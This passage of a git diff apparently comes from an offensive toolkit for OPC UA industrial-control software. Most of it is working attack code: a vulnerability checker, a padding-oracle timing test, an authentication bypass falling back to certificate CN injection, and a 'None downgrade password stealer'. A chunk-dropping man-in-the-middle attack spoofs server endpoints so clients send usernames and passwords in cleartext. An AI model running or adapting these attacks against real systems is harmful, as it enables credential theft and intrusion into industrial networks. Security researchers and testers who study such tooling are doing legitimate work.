len(datastr) > 200: + datastr = datastr[:40] + "..." + + log(f'{prefix}+ {name}: {datastr}') + + +def server_checker(url : str, test_timing_attack : bool): + log(f'Checking {url}...') + endpoints = get_endpoints(url) + encrypt_endpoints = [i for i, ep in enumerate(endpoints) if ep.securityMode == MessageSecurityMode.SIGN_AND_ENCRYPT] + log(f'{len(endpoints)} endpoints:') + findings = [] + pkcs1_ep = None + + log('-----------------------') + for i, ep in enumerate(endpoints, start=1): + epname = f'Endpoint #{i} ({ep.endpointUrl})' + log_object(epname, ep) + log('-----------------------') + + tokentypes = [t.tokenType for t in ep.userIdentityTokens] + + # HTTPS reflect/relay. + relay_candidate = False + if ep.securityPolicyUri == SecurityPolicy.NONE and UserTokenType.ANONYMOUS in tokentypes: + findings.append(f'{epname} allows anonymous access. It might not require authentication for data access.') + if ep.transportProfileUri.endswith('https-uabinary'): + findings.append(f'{epname} supports the HTTPS protocol. It may be vulnerable to a reflect/relay attack.') + relay_candidate = True + + # Padding oracle. + if ep.securityPolicyUri == SecurityPolicy.BASIC128RSA15: + findings.append(f'{epname} supports the vulnerable Basic128Rsa15 policy. It may be vulnerable to a padding oracle attack (which would enable reflect, relay, decrypt and sigforge).') + relay_candidate = True + pkcs1_ep = ep + if ep.securityPolicyUri == SecurityPolicy.NONE and UserTokenType.USERNAME in tokentypes: + if any(t.tokenType == UserTokenType.USERNAME and t.securityPolicyUri == SecurityPolicy.BASIC128RSA15 for t in ep.userIdentityTokens): + findings.append(f'{epname} supports password encryption with Basic128Rsa15. It may be vulnerable to a padding oracle attack (which would enable reflect, relay, decrypt and sigforge).') + relay_candidate = True + else: + findings.append(f'{epname} supports password encryption. If PKCS#1v1.5 passwords are accepted it may be vulnerable to a padding oracle attack (which would enable reflect, relay, decrypt and sigforge).') + relay_candidate = True + + # User cert relay. + if relay_candidate and UserTokenType.CERTIFICATE in tokentypes: + findings.append(f'{epname} supports user authentication with certificates. Could potentially also be bypassed via reflect or relay.') + + # Discovery warning. + if url not in ep.server.discoveryUrls: + findings.append('Requested URL not in endpoint discovery URL list. Maybe try checking one of the discovery URLs as well?') + + # Downgrade attacks. TODO: confirm + # if ep.securityPolicyUri == SecurityPolicy.NONE and UserTokenType.USERNAME in tokentypes or UserTokenType.ISSUEDTOKEN in tokentypes: + # findings.append(f'{epname} supports user password or token authentication over a None channel. May be vulnerable to a disclosure via a MitM downgrade.') + + # if ep.securityMode == MessageSecurityMode.SIGN and encrypt_endpoints: + # if len(encrypt_endpoints) > 0: + # secondpart = ' and '.join(f'endpoint #{epnum}' for epnum in encrypt_endpoints) + ' support SIGN_AND_ENCRYPT' + # else: + # secondpart = f'endpoint #{encrypt_endpoints[0]} supports SIGN_AND_ENCRYPT' + # findings.append(f'{epname} has security mode SIGN while {secondpart}. It may be vulnerable to a MitM downgrade.') + + if findings: + log('') + log('Findings:') + for f in findings: + log_success(f) + else: + log('No findings about these endpoints.') + + log('Note: cn-inject vulnerabilities have not been checked.') + if not test_timing_attack and not pkcs1_ep: + log('Note: Even when Basic128Rsa15 is not supported, the padding oracle may still work. Try running with -t.') + + if test_timing_attack: + if not pkcs1_ep: + i, pkcs1_ep = max(enumerate(endpoints, start=1), key=lambda i_ep: [i_ep[1].transportProfileUri.endswith('uatcp-uasc-uabinary'), i_ep[1].securityPolicyUri != SecurityPolicy.NONE]) + log(f'No endpoint advertising Basic128Rsa15. Trying Endpoint #{i} with policy {pkcs1_ep.securityPolicyUri.value} instead.') + + log('Testing OpenSecureChannel timing attack...') + results = {} + for expandval in [10,30,50,100]: + log(f'Expansion parameter {expandval}:') + keylen = certificate_publickey(pkcs1_ep.serverCertificate).size_in_bytes() + n, e = certificate_publickey_numbers(pkcs1_ep.serverCertificate) + okpads = 50 + nokpads = 50 + ok_time = 0 + nok_time = 0 + minok = math.inf + maxnok = 0 + for i, (padding_ok, plaintext) in enumerate(padding_oracle_testinputs(keylen, n, okpads, nokpads), start=1): + inputval = int2bytes(pow(plaintext, e, n), keylen) * expandval + oracle = OPNPaddingOracle(pkcs1_ep) + oracle._setup() + starttime = time.time() + try: + oracle._attempt_query(inputval) + except: + pass + duration = time.time() - starttime + + log(f'Test {i}: {"good" if padding_ok else "bad"} padding; time: {duration}') + if padding_ok: + ok_time += duration + minok = min(duration, minok) + else: + nok_time += duration + maxnok = max(duration, maxnok) + + try: + oracle._cleanup() + except: + pass + + results[expandval] = { + 'avgok': ok_time / okpads, + 'minok': minok, + 'avgnok': nok_time / nokpads, + 'maxnok': maxnok + } + log('-----------------') + + log('Timing experiment results:') + for expandval, result in results.items(): + log_success(f'Expansion parameter {expandval}:') + log_success(f'Average time with correct padding: {result["avgok"]}') + log_success(f'Average time with incorrect padding: {result["avgnok"]}') + log_success(f'Shortest time with correct padding: {result["minok"]}') + log_success(f'Longest time with incorrect padding: {result["maxnok"]}') + log_success('-----------------') + + +def auth_check(url : str, skip_none : bool, demo : bool): + # Tests whether server allows authentication at all. + endpoints = get_endpoints(url) + + chan, token = None, None + if not skip_none: + for ep in endpoints: + if ep.securityPolicyUri == SecurityPolicy.NONE: + try: + log(f'Trying to log in to None endpoint {ep.endpointUrl}') + proto, _, _ = parse_endpoint_url(url) + chan = unencrypted_opn(connect_and_hello(url)) if proto == TransportProtocol.TCP_BINARY else url + createreply = generic_exchange(chan, SecurityPolicy.NONE, createSessionRequest, createSessionResponse, + requestHeader=simple_requestheader(), + clientDescription=applicationDescription.create( + applicationUri=TEMPLATE_APP_URI, + productUri=TEMPLATE_APP_URI, + applicationName=LocalizedText(text=TEMPLATE_APP_URI), + applicationType=ApplicationType.CLIENT, + gatewayServerUri=None, + discoveryProfileUri=None, + discoveryUrls=[], + ), + serverUri=ep.server.applicationUri, + endpointUrl=ep.endpointUrl, + sessionName=None, + clientNonce=None, + clientCertificate=ep.serverCertificate, + requestedSessionTimeout=600000, + maxResponseMessageSize=2**24, + ) + + log(f'CreateSessionRequest succeeded. Now trying to activate it...') + + anon_policies = [p for p in ep.userIdentityTokens if p.tokenType == UserTokenType.ANONYMOUS] + id_token = anonymousIdentityToken.create(policyId=anon_policies[0].policyId) if anon_policies else None + activatereply = generic_exchange(chan, SecurityPolicy.NONE, activateSessionRequest, activateSessionResponse, + requestHeader=simple_requestheader(createreply.authenticationToken), + clientSignature=signatureData.create(algorithm=None,signature=None), + clientSoftwareCertificates=[], + localeIds=[], + userIdentityToken=id_token, + userTokenSignature=signatureData.create(algorithm=None,signature=None), + ) + log_success('Session activation successful!') + if demo: + demonstrate_access(chan, createreply.authenticationToken, SecurityPolicy.NONE) + return + except ServerError as err: + log(f'Attempt failed due to server error {hex(err.errorcode)}: "{err.reason}"') + except Exception as ex: + log(f'Attempt failed due to Exception {type(ex).__name__}: "{ex}"') + + log('Anonymous login didn\'t work. Trying self-signed certificate next.') + + inject_cn_attack(url, TEMPLATE_APP_URI, False, demo) + +# While acting as a server, read an OPC message from a client. +def read_client_msg(sock : socket, msg_type : Type[OpcMessage]) -> OpcMessage: + with sock.makefile('rb') as sockio: + msg = msg_type() + msg.from_bytes(sockio) + return msg + +# Same for writing. +def write_client_msg(sock : socket, msg : OpcMessage, final_chunk : bool=True): + with sock.makefile('wb') as sockio: + sockio.write(msg.to_bytes(final_chunk)) + sockio.flush() + +# A client attack is a coroutine that receives client connection sockets. +ClientAttack = Generator[None, socket, None] + +# Sets up and executes an attack against (taking server endpoints as a parameter) an OPC client instead of a server. +# Also capable of forcing a client connection via ReverseHello, in which case the listen address is used as an +# endpointUri in the Reversehello message. +def client_attack( + attacker_factory : Callable[[List[endpointDescription.Type]], ClientAttack], + server_url : str, + listen_host : str, listen_port : int, + revhello_addr : Optional[Tuple[str, int]] = None, + persist : bool = False + ): + # First try connecting to the server. + server_eps = get_endpoints(server_url) + log(f'Got {len(server_eps)} server endpoints from {server_url}.') + + if revhello_addr is None: + # Start listening for client connection. + listener = create_server((listen_host, listen_port)) + log(f'Started listening for an incoming client connections on {listen_host}:{listen_port}.') + def clientsocker(): + clientsock, peeraddr = listener.accept() + log_success(f'Received a connection from {peeraddr[0]}:{peeraddr[1]}.') + return clientsock + else: + server_uri = server_eps[0].server.applicationUri + revurl = f'opc.tcp://{listen_host}:{listen_port}/' + def clientsocker(): + log(f'Connecting to client {":".join(revhello_addr)}...') + clientsock = socket.create_connection(revhello_addr) + log(f'Connected. Now sending ReverseHello with server URI "{server_uri}" and endpoint URL "{revurl}".') + write_client_msg(clientsock, ReverseHelloMessage( + severUri=server_uri, + endpointUrl=revurl, + )) + return clientsock + + while True: + attacker = attacker_factory(server_eps) + attacker.send(None) + try: + while True: + attacker.send(clientsocker()) + except StopIteration: + if not persist: + break + + if revhello_addr is None: + listener.shutdown(SHUT_RDWR) + listener.close() + + +# None downgrade password stealer. +def nonegrade_mitm(server_eps : List[endpointDescription.Type]) -> ClientAttack: + # Make a spoofed endpoint with None security that only accepts passwords. + # Base this on an existing endpoint, preferably those similar to what we want. + spoofed_ep = max(server_eps, key=lambda ep: ep.securityPolicyUri == SecurityPolicy.NONE) + spoofed_policy = max(spoofed_ep.userIdentityTokens, default=None, key=lambda p: p.tokenType == UserTokenType.USERNAME) + if not spoofed_policy or spoofed_policy.tokenType != UserTokenType.USERNAME: + spoofed_policy = userTokenPolicy.create( + policyId='1', + tokenType=UserTokenType.USERNAME, + issuedTokenType=None, + issuerEndpointUrl=None, + securityPolicyUri=SecurityPolicy.NONE, + ) else: - raise AttackNotPossible('TODO: implement combination with OPN attack.') + spoofed_policy = spoofed_policy._replace(securityPolicyUri=SecurityPolicy.NONE) + spoofed_ep = spoofed_ep._replace( + securityPolicyUri=SecurityPolicy.NONE, + securityMode=MessageSecurityMode.NONE, + userIdentityTokens=[spoofed_policy] + ) + + # Creates a simple response header based on a request. + def simple_respheader(reqheader): + return responseHeader.create( + timeStamp=datetime.now(), + requestHandle=reqheader.requestHandle, + serviceResult=0, + serviceDiagnostics=None, + stringTable=[], + additionalHeader=None, + ) + + # Server loop. + while True: + clientsock = yield + + # Get hello. + hello = read_client_msg(clientsock, HelloMessage) + log('Received Hello message from client.') + + # Reflect buffer sizes in Ack. + write_client_msg(clientsock, AckMessage(**{name: getattr(hello, name) for name, _ in AckMessage.fields})) + + # Next should be an unencrypted OPN. + opn = read_client_msg(clientsock, OpenSecureChannelMessage) + log('Received OpenSecureChannel from client.') + if opn.securityPolicyUri != SecurityPolicy.NONE: + raise AttackNotPossible(f'OPN from client has unexpected security policy {opn.securityPolicyUri}.') + + # Send an OPN response initiating an unencrypted channel. + opnconv, _ = encodedConversation.from_bytes(opn.encodedPart) + opnreq, _ = openSecureChannelRequest.from_bytes(opnconv.requestOrResponse) + token = channelSecurityToken.create( + channelId=opn.secureChannelId + 1, + tokenId=1, + createdAt=datetime.now(), + revisedLifetime=opnreq.requestedLifetime, + ) + write_client_msg(clientsock, OpenSecureChannelMessage( + secureChannelId=token.channelId, + securityPolicyUri=SecurityPolicy.NONE, + senderCertificate=None, + receiverCertificateThumbprint=None, + encodedPart=encodedConversation.to_bytes(encodedConversation.create( + sequenceNumber=opnconv.sequenceNumber, + requestId=opnconv.requestId, + requestOrResponse=openSecureChannelResponse.to_bytes(openSecureChannelResponse.create( + responseHeader=simple_respheader(opnreq.requestHeader), + serverProtocolVersion=0, + securityToken=token, + serverNonce=None, + )) + )) + )) + + # Response message helper. + def responder(reqmsg, resptype, **data): + reqHeader, _ = requestHeader.from_bytes(NodeIdField().from_bytes(reqmsg.requestOrResponse)[1]) + write_client_msg(clientsock, ConversationMessage( + secureChannelId=token.channelId, + tokenId=token.tokenId, + encodedPart=encodedConversation.to_bytes(encodedConversation.create( + sequenceNumber=reqmsg.sequenceNumber, + requestId=reqmsg.requestId, + requestOrResponse=resptype.to_bytes(resptype.create( + responseHeader=simple_respheader(reqHeader), + **data + )), + )) + )) + + # Expecting either GetEndpoints or CreateSession from the client next. + convomsg1 = read_client_msg(clientsock, ConversationMessage) + convo1, _ = encodedConversation.from_bytes(convomsg1.encodedPart) + try: + ep_req, _ = getEndpointsRequest.from_bytes(convo1.requestOrResponse) + except DecodeError: + ep_req = None + + if ep_req: + # Respond with the spoofed endpoint. + log('Received GetEndpointsRequest. Responding with spoofed (unencrypted password demanding) endpoint.') + responder(convo1, getEndpointsResponse, endpoints=[spoofed_ep]) + else: + csr, _ = createSessionRequest.from_bytes(convo1.requestOrResponse) + log('Received CreateSessionRequest.') + responder(convo1, createSessionResponse, + sessionId=NodeId(9,1234), + authenticationToken=NodeId(9,1235), + revisedSessionTimeout=csr.requestedSessionTimeout, + serverNonce=None, + serverCertificate=spoofed_ep.serverCertificate, + serverEndpoints=[spoofed_ep], + serverSoftwareCertificates=[], + serverSignature=signatureData.create(algorithm=None,signature=None), + maxRequestMessageSize=csr.maxResponseMessageSize, + ) -def relay_attack(source : Tuple[str, int], target : Tuple[str, int]): - a2url = lambda addr: f'opc.tcp://{":".join(addr)}/' - log(f'Attempting relay from {a2url(source)} to {a2url(target)}') - seps = get_endpoints(*source) - log(f'Listed {len(seps)} endpoints from {a2url(source)}.') - teps = get_endpoints(*target) - log(f'Listed {len(teps)} endpoints from {a2url(target)}.') - - for sep, tep in itertools.product(seps, teps): - if sep.policy == tep.policy == SecurityPolicy.NONE: - log(f'Trying endpoints {a2url((sep.host, sep.port))} -> {a2url((tep.host, tep.port))} (both NONE security policy)') - with connect_and_hello(sep.host, sep.port) as ssock, connect_and_hello(tep.host, tep.port) as tsock: - mainchan, oraclechan = unencrypted_opn(tsock), unencrypted_opn(ssock) - token = execute_relay_attack(oraclechan, sep, mainchan, tep) - log_success(f'Attack succesfull! Authenticated session set up with {tep.host}.') - demonstrate_access(mainchan, token) + # Finally consume ActivateSessionRequest. + convomsg2 = read_client_msg(clientsock, ConversationMessage) + convo2, _ = encodedConversation.from_bytes(convomsg2.encodedPart) + asr, _ = activateSessionRequest.from_bytes(convo2.requestOrResponse) + log_success('Received unencrypted ActivateSessionResponse from client.') + if asr.userIdentityToken.policyId != spoofed_policy.policyId: + raise AttackNotPossible(f'Client picked unexpected policy ID: {asr.userIdentityToken.policyId}') + + log_success(f'Username: {asr.userIdentityToken.userName}') + if asr.userIdentityToken.encryptionAlgorithm: + log('However, password is still encrypted.') + else: + pwd = asr.userIdentityToken.password.decode(errors="replace") + log_success(f'Password: {pwd}') + + # Kill this connection and end the attack round. + clientsock.shutdown(SHUT_RDWR) + clientsock.close() + return + +# MitM attack that uses the chunk dropping attack to modify signed endpoint info to trick a client into exposing its +# password. +# If tcp_resets is True intentional connection interruptions will be introduced to make a client accept gaps even when +# it is strictly enforcing https://reference.opcfoundation.org/Core/Part6/v104/docs/6.7.2.4 +def chunkdrop_mitm(server_eps : List[endpointDescription.Type], tcp_resets : bool=False) -> ClientAttack: + if tcp_resets: + raise Exception('tcp_resets feature not yet implemented') + + # Given a binary endpoint array, this will return a list of byteranges to drop to turn the result into a suitable + # endpoint description. + # Attempts to create an array with a single endpoint with a Sign security mode that requires an unencrypted password. + def ranges_to_drop(ep_bytes): + # Store offsets and values of array elements. + epcount, todo = IntField().from_bytes(ep_bytes) + offsets = [None] * epcount + for i in range(0, epcount): + offsets[i] = len(ep_bytes) - len(todo) + _, todo = endpointDescription.from_bytes(todo) + + # State for subroutines to update. + cursor = 0 + result = [] + + # Drop a certain amount of bytes. Throws an error if end is reached. + def dropbytes(count): + # print(f'dropbytes {count}') + nonlocal cursor, result + if count == 0: return + + assert(count > 0) + if cursor < len(ep_bytes): + if result and result[-1][1] == cursor: + result[-1] = (result[-1][0], result[-1][1] + count) + else: + result += [(cursor, cursor + count)] + cursor += count + else: + errormsg = 'Server endpoint list did not allow desired mutation' + if epcount == 1: + errormsg += ' because it only contained a single endpoint' + elif epcount < 4: + errormsg += f'. Probably because it only contained {epcount} entries' + errormsg += '.\n Perhaps try against a discovery service instead?' + raise AttackNotPossible(errormsg) + + # Keep dropping ranges until a specific desired byte range is added to the result. + def drop_until_bytes(byteseq): + # print(f'drop_until_bytes {repr(byteseq)}') + nonlocal cursor + + tomatch = byteseq + while tomatch: + if cursor < len(ep_bytes) and ep_bytes[cursor] == tomatch[0]: + cursor += 1 + tomatch = tomatch[1:] + else: + dropbytes(1) + + # Drop bytes until the cursor is positioned in front of a specific endpoint field. + def drop_until_field(fieldname): + # print(f'drop_until_field {fieldname}') + nonlocal cursor + + # Find starting offset of endpoint the cursor is currently in. + rcursor = max((offset for offset in offsets if offset <= cursor), default=offsets[0]) + + # Keep consuming endpoint description until either cursor or field is reached. + # Run through the description at most twice. + for _ in range(0,2): + for descName, descType in endpointDescription.fields: + if rcursor > cursor: + dropbytes(rcursor - cursor) + + if rcursor == cursor and descName == fieldname: + # Got it. + return + else: + rcursor = len(ep_bytes) - len(descType.from_bytes(ep_bytes[rcursor:])[1]) + + # Should have returned or raised by now, if fieldname is valid. + assert(False) + + # Consume a field. Keep it (and return True) if it meets the predicate. Otherwise drop it. + def checkfield(fieldType, predicate=lambda _: True): + # print(f'checkfield {type(fieldType).__name__}') + nonlocal cursor + + field, tail = fieldType.from_bytes(ep_bytes[cursor:]) + fieldsize = len(ep_bytes) - cursor - len(tail) + assert(fieldsize > 0) + if predicate(field): + cursor += fieldsize + return True + else: + dropbytes(fieldsize) + return False + + # First, make the resulting array length one. + drop_until_bytes(b'\x01\x00\x00\x00') + + # Keep general server info. + drop_until_field('endpointUrl') + checkfield(StringField()) # endpointUrl + checkfield(applicationDescription) # server + checkfield(ByteStringField()) # serverCertificate + + # Spoof a Sign security mode. + drop_until_bytes(b'\x02\x00\x00\x00') + + # Next a non-None security policy is needed for channel security. + while not checkfield(SecurityPolicyField(), lambda sp: sp != SecurityPolicy.NONE): + drop_until_field('securityPolicyUri') + + # Set Identity token array and policyId string lengths to 1. + drop_until_bytes(b'\x01\x00\x00\x00' * 2) + + # Set single policyId character to whatever. + cursor += 1 + + # Enforce UserName token type. + drop_until_bytes(EnumField(UserTokenType).to_bytes(UserTokenType.USERNAME)) + + # Two null strings. + drop_until_bytes(b'\xff' * 8) + + # Finally make a None security policy is needed for password security. + # This will probably either a subsequent None endpoint or token policy. But otherwise there's a good change the + # prefix can be taken from some other policy and the four bytes spelling out "None" from certificate data. + drop_until_bytes(SecurityPolicyField().to_bytes(SecurityPolicy.NONE)) + + # Finish with a TCP transport profile. + drop_until_field('transportProfileUri') + while not checkfield(StringField(), lambda pu: pu.endswith('uatcp-uasc-uabinary')): + drop_until_field('transportProfileUri') + + # Finally, drop all but the last byte, the securityLevel of the last endpoint in the list. + dropbytes(len(ep_bytes) - cursor - 1) + return result - raise AttackNotPossible('TODO: implement combination with OPN attack.') + # Test if rangedropping works on this endpoint list. + log(f'Testing if attack is applicable.') + server_epbytes = ArrayField(endpointDescription).to_bytes(server_eps) + dropranges = ranges_to_drop(server_epbytes) + + if not any(ep.securityMode == MessageSecurityMode.SIGN for ep in server_eps): + log('Warning: server does not advertise Sign security mode. Attack will probably not work, but trying anyway.') + + # Compute new endpoint list (and double-check if calculation was correct). + spoofed_epbytes = b'' + prev_end = 0 + for start, end in dropranges: + spoofed_epbytes += server_epbytes[prev_end:start] + prev_end = end + spoofed_epbytes += server_epbytes[prev_end:] + spoofed_ep = ArrayField(endpointDescription).from_bytes(spoofed_epbytes)[0][0] + + assert(spoofed_ep.securityMode == MessageSecurityMode.SIGN and spoofed_ep.userIdentityTokens[0].tokenType == UserTokenType.USERNAME) + log_success('Succesfully transformed token list into spoofed (password revealing) variant.') + + # Use server associated with this endpoint as upstream. + proto, serverhost, serverport = parse_endpoint_url(spoofed_ep.endpointUrl) + assert proto == TransportProtocol.TCP_BINARY + log(f'Using {serverhost}:{serverport} as upstream server.') + + # Check if server allows tiny chunks. + spoofed_hello = HelloMessage( + version=0, + receiveBufferSize=2**16, + sendBufferSize=2**16, + maxMessageSize=1, + maxChunkCount=2**16-1, + endpointUrl=spoofed_ep.endpointUrl, + ) + with create_connection((serverhost, serverport)) as serversock: + opc_exchange(serversock, spoofed_hello, AckMessage()) + log_success(f'Server appears to accept maxMessageSize of 1 and maxChunkCount of {spoofed_hello.maxChunkCount}') + + + # MitM loop. + while True: + clientsock = yield + with create_connection((serverhost, serverport)) as serversock: + log('Connected to both client and server.') + + read_client_msg(clientsock, HelloMessage) + log('Got Hello from client. Sending spoofed version to server.') + ack = opc_exchange(serversock, spoofed_hello, AckMessage()) + ack.maxMessageSize = 1 + write_client_msg(clientsock, ack) + + # Forward OPN. Response may be chunked. + client_opn = read_client_msg(clientsock, OpenSecureChannelMessage) + cleartext = client_opn.securityPolicyUri == SecurityPolicy.NONE + log(f'Forwarding {"cleartext" if cleartext else "encrypted"} OpenSecureChannelRequest') + chunks = list(chunkable_opc_exchange(serversock, client_opn)) + for i, chunk in enumerate(chunks): + write_client_msg(clientsock, chunk, i == len(chunks) - 1) + + # Keep processing conversation messages until the attack is finished or the client closes the channel. + # Usually the latter will happen once the client has received the (spoofed) endpoint list, which it + # will then use for a second connection. + try: + while True: + client_convo = read_client_msg(clientsock, ConversationMessage) + + # Check client message. + try: + reqbytes = encodedConversation.from_bytes(client_convo.encodedPart)[0].requestOrResponse + except DecodeError as err: + if not cleartext: + raise AttackNotPossible('Could not decode conversation. It is probably using SignAndEncrypt mode.') + else: + raise err + + if activateSessionRequest.check_type(reqbytes): + # Got what we want. + asr, _ = activateSessionRequest.from_bytes(reqbytes) + log_success('Received unencrypted ActivateSessionRequest') + log_success(f'Username: {asr.userIdentityToken.userName}') + if asr.userIdentityToken.encryptionAlgorithm: + log('However, password is still encrypted.') + else: + pwd = asr.userIdentityToken.password.decode(errors="replace") + log_success(f'Password: {pwd}') + + # Done. + return + + else: + log('Forwarding ConversationMessage to server...') + server_chunks = list(chunkable_opc_exchange(serversock, client_convo)) + log(f'Got {len(server_chunks)} chunks back.') + + # Glue chunks back together, dropping any signatures. + resp_parts = list(encodedConversation.from_bytes(c.encodedPart)[0].requestOrResponse for c in server_chunks) + respbytes = b''.join(resp_parts) + + # Handling depends on response type. + if getEndpointsResponse.check_type(respbytes): + resp, _ = getEndpointsResponse.from_bytes(respbytes) + log('Endpoints request: replacing result with spoofed endpoint.') + write_client_msg(clientsock, ConversationMessage( + secureChannelId=server_chunks[0].secureChannelId, + tokenId=server_chunks[0].tokenId, + encodedPart=encodedConversation.to_bytes(encodedConversation.from_bytes(server_chunks[0].encodedPart)[0]._replace( + requestOrResponse=getEndpointsResponse.to_bytes(resp._replace(endpoints=[spoofed_ep])) + )) + )) + elif createSessionResponse.check_type(respbytes): + if not all(len(part) == 1 for part in resp_parts): + raise AttackNotPossible('Got CreateSessionResponse, but not all chunks are one byte long.') + + # Find the binary offset and length of the endpoint list. + todo = respbytes + for fieldName, fieldType in createSessionResponse.fields: + if fieldName == 'serverEndpoints': + eplist_start = len(respbytes) - len(todo) + _, todo = fieldType.from_bytes(todo) + eplist_end = len(respbytes) - len(todo) + break + else: + _, todo = fieldType.from_bytes(todo) + + # Run the range dropping algorithm again. It may fail if more fields are ommitted. + dropranges = ranges_to_drop(respbytes[eplist_start:eplist_end]) + log_success('Managed to drop ranges from CreateSessionResponse as well.') + + # Adjust for full response body. + dropranges = [(start + eplist_start, end + eplist_start) for start, end in dropranges] + + # Drop associated chunks. + keep_chunks = [] + lastend = 0 + for start, end in dropranges: + keep_chunks += server_chunks[lastend:start] + lastend = end + keep_chunks += server_chunks[lastend:] + + # Send these to the client. + log('Sending selected subset of chunks to client...') + for chunk in keep_chunks[:-1]: + write_client_msg(clientsock, chunk, False) + write_client_msg(clientsock, keep_chunks[-1], True) + + else: + log('Unknown message type. Forwarding it anyway.') + for chunk in server_chunks[:-1]: + write_client_msg(clientsock, chunk, False) + write_client_msg(clientsock, server_chunks[-1], True) + + except ClientClosedChannel: + pass + \ No newline at end of file diff --git a/crypto.py b/crypto.py index 7ae1197..1742b32 100644 --- a/crypto.py +++ b/crypto.py @@ -1,12 +1,17 @@ from message_fields import * -from Crypto.PublicKey.RSA import RsaKey +from Crypto.PublicKey import RSA +from Crypto.PublicKey.RSA import RsaKey, import_key from Crypto.Signature import pkcs1_15, pss from Crypto.Hash import SHA1, SHA256 from Crypto.Cipher import PKCS1_v1_5, PKCS1_OAEP, AES from Crypto.Util.Padding import pad, unpad +from OpenSSL import crypto + import hmac, hashlib +from datetime import datetime, timedelta +from functools import cache # Asymmetric stuff for OPN messages, authentication signatures and passwords. @@ -16,13 +21,22 @@ def rsa_sign(policy: SecurityPolicy, privkey : RsaKey, message : bytes) -> bytes hasher, signer = { SecurityPolicy.BASIC128RSA15 : (SHA1, pkcs1_15), - SecurityPolicy.BASIC256 : (SHA1, pkcs1_15), + SecurityPolicy.BASIC256 : (SHA256, pkcs1_15), SecurityPolicy.AES128_SHA256_RSAOAEP : (SHA256, pkcs1_15), SecurityPolicy.BASIC256SHA256 : (SHA256, pkcs1_15), SecurityPolicy.AES256_SHA256_RSAPSS : (SHA256, pss), }[policy] - return signer.new().sign(hasher.new(message)) + return signer.new(privkey).sign(hasher.new(message)) + +def rsa_siguri(policy: SecurityPolicy) -> str: + return { + SecurityPolicy.BASIC128RSA15 : 'http://www.w3.org/2000/09/xmldsig#rsa-sha1', + SecurityPolicy.BASIC256 : 'http://www.w3.org/2001/04/xmldsig-more#rsa-sha256', + SecurityPolicy.AES128_SHA256_RSAOAEP : 'http://www.w3.org/2001/04/xmldsig-more#rsa-sha256', + SecurityPolicy.BASIC256SHA256 : 'http://www.w3.org/2001/04/xmldsig-more#rsa-sha256', + SecurityPolicy.AES256_SHA256_RSAPSS : 'http://opcfoundation.org/UA/security/rsa-pss-sha2-256', + }[policy] def rsa_plainblocksize(policy: SecurityPolicy, key : RsaKey) -> int: @@ -35,10 +49,10 @@ def rsa_plainblocksize(policy: SecurityPolicy, key : RsaKey) -> int: SecurityPolicy.AES256_SHA256_RSAPSS : 66, }[policy] - return pubkey.size_in_bytes() - padsize + return key.size_in_bytes() - padsize def rsa_getcipher(policy: SecurityPolicy, key : RsaKey) -> object: - if policy == SecurityPolicy.NONE + if policy == SecurityPolicy.NONE: return None else: cipherclass = PKCS1_v1_5 if policy == SecurityPolicy.BASIC128RSA15 else PKCS1_OAEP @@ -87,7 +101,6 @@ def prf(hasher : str, secret : bytes, seed : bytes, outlen : int) -> bytes: result += kdf(aval + seed) return result[:outlen] - def deriveKeyMaterial(policy: SecurityPolicy, clientNonce : bytes, serverNonce : bytes) -> SessionCrypto: ivlen = 16 @@ -104,7 +117,7 @@ def oneside(secret, seed): return OneSideSessionKeys( signingKey=keydata[0:siglen], encryptionKey=keydata[siglen:siglen+enclen], - iv=keydata[siglen+enclen:ivlen], + iv=keydata[siglen+enclen:siglen+enclen+ivlen], ) return SessionCrypto( @@ -113,11 +126,13 @@ def oneside(secret, seed): serverKeys=oneside(clientNonce, serverNonce) ) -def pkcs7_pad(message : bytes, blocksize) -> bytes: +def pkcs7_pad(message : bytes, blocksize : int) -> bytes: return pad(message, blocksize) -def pkcs7_unpad(message : bytes, blocksize) -> bytes: - return unpad(message, blocksize) +def pkcs7_unpad(message : bytes, blocksize : int) -> bytes: + # return unpad(message, blocksize) + # Alternative implementation that accepts non-aligned block sizes. + return message[:-message[-1]] def aes_cbc_encrypt(key : bytes, iv : bytes, padded_plaintext : bytes) -> bytes: return AES.new(key, AES.MODE_CBC, iv=iv).encrypt(padded_plaintext) @@ -147,4 +162,120 @@ def macsize(policy : SecurityPolicy) -> int: SecurityPolicy.AES128_SHA256_RSAOAEP : 32, SecurityPolicy.BASIC256SHA256 : 32, SecurityPolicy.AES256_SHA256_RSAPSS : 32, - }[policy] \ No newline at end of file + }[policy] + +def certificate_thumbprint(cert : bytes) -> bytes: + # Computes a certificate thumbprint as used in the protocol. + return hashlib.new('sha1', cert).digest() + +def certificate_publickey(cert : bytes) -> RsaKey: + pk = crypto.load_certificate(crypto.FILETYPE_ASN1, cert).get_pubkey() + return import_key(crypto.dump_publickey(crypto. FILETYPE_ASN1, pk)) + +def certificate_publickey_numbers(cert : bytes) -> tuple[int, int]: + # Extracts and parses an RSA public key from a certificate, as (m, e) integers. + numbers = crypto.load_certificate(crypto.FILETYPE_ASN1, cert).get_pubkey().to_cryptography_key().public_numbers() + return numbers.n, numbers.e + +def selfsign_cert(template : bytes, cn : str, expiry : datetime) -> tuple[bytes, RsaKey]: + # Generates a self-signed copy of template (DER encoded) with a given CN and validity. + # Returns it with (fresh) associated private key. + key = crypto.PKey() + key.generate_key(crypto.TYPE_RSA, 2048) + + # Build self-signed cert. + cert = crypto.load_certificate(crypto.FILETYPE_ASN1, template) + cert.set_pubkey(key) + subject = cert.get_subject() + subject.commonName = cn + cert.set_issuer(subject) + cert.set_subject(subject) + + # Set validity from three days ago until expiry. + asn1format = '%Y%m%d%H%M%SZ' + cert.set_notBefore((datetime.now() - timedelta(days=3)).strftime(asn1format).encode()) + cert.set_notAfter(expiry.strftime(asn1format).encode()) + + # Sign with the private key. + cert.sign(key, 'sha256') + + # Convert key to pycryptodrome object. + keybytes = crypto.dump_privatekey(crypto. FILETYPE_ASN1, key) + return crypto.dump_certificate(crypto.FILETYPE_ASN1, cert), import_key(keybytes) + +def applicationuri_from_cert(certificate : bytes) -> str: + # Reads the first SAN (or otherwise Common Name) from a certificate, which is to be used as an applicationUri. + cert = crypto.load_certificate(crypto.FILETYPE_ASN1, certificate) + for i in range(0, cert.get_extension_count()): + ext = cert.get_extension(i) + if b'subjectAltName' in ext.get_short_name(): + name = str(ext).split(',')[0] + if name.startswith('URI:'): + name = name[4:] + return name + + return cert.get_subject().commonName + + +def int2bytes(value : int, outlen : int) -> bytes: + # Coverts a nonnegative integer to a fixed-size big-endian binary representation. + result = [0] * outlen + j = value + for ix in reversed(range(0, 